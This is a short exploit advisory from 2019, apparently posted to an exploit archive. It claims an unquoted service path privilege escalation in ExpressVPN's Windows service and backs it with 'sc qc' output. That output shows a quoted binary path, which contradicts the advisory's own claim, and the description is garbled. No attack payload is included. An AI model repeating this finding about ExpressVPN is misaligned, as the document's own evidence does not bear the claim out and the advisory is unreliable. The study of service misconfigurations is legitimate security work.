******************************************************** # Exploit Title : ExpressVPN - Unquoted Service Path Privilege Escalation # Vendor Homepage : www.expressvpn.com # Exploit Author: Iran Cyber Security Group # Date : 2019-07-14 # Tested on : Win10 # Discovered By : Und3rgr0und # Our Team : www.iran-cyber.net ******************************************************* # Description : An older access system gives users access to up levels access. ExpressVPN installs a service ("ExpressVPNService") with an unquoted service path running with SYSTEM privileges. This allows any non-privileged local user to execute arbitrary code with SYSTEM privileges. # POC : C:\xpl\Und3rgr0und>sc qc ExpressVPNService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ExpressVPNService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ExpressVPN Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem *******************************************************